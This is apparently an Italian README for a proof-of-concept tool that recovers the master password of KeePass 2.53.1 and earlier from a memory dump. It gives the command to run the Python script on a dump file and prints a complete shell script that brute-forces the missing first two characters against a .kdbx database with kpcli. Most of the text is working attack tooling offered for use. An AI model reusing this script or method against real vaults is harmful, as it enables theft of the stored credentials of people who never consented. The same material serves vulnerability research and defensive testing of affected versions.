
Recupera la password principale di un database KeePass <= 2.53.1
python3 poc.py <PathToDmp>

Come promemoria, il primo carattere non può essere trovato nel dump, e per il secondo lo script ti darà solo alcune possibilità, in ogni caso ti consigliamo di eseguire il bruteforce su 2 caratteri con lo script qui sotto
#!/bin/sh
# Usage: ./keepass-pwn.sh Database.kdbx wordlist.txt (wordlist with 2 char)
while read i
do
echo "Using password: \"$i\""
echo "$i" | kpcli --kdb=$1 && exit 0
done < $2
Questo script funziona molto bene nel caso di una macchina fisica, per le macchine virtuali non sembra stabile
Comunque: lo script python presente in questo progetto segue la lettura del seguente progetto: https://github.com/vdohney/keepass-password-dumper